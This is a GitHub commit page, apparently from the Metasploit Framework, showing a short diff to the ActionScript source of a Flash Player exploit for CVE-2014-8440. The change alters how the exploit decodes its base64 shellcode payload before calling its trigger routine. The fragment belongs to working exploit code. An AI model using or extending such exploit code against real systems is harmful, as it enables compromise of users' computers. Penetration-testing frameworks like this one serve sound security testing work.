Skip to content

Commit 5c8c5ae

Browse files
committed
1 parent da36291 commit 5c8c5ae

File tree

2 files changed

+5
-2
lines changed
  • data/exploits/CVE-2014-8440
  • external/source/exploits/CVE-2014-8440

2 files changed

+5
-2
lines changed

data/exploits/CVE-2014-8440/msf.swf

7 Bytes
Binary file not shown.

external/source/exploits/CVE-2014-8440/Msf.as

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -42,8 +42,11 @@ package
4242
this.object_vector_length = 5770 * 2
4343
this.byte_array_vector_length = 510 * 2
4444

45-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
46-
payload = b64.toByteArray().toString();
45+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
46+
var pattern:RegExp = / /g;
47+
b64_payload = b64_payload.replace(pattern, "+")
48+
b64.decode(b64_payload)
49+
payload = b64.toByteArray().toString()
4750

4851
this.initialize_worker_and_ba()
4952
if (!this.trigger())

0 commit comments

Comments
 (0)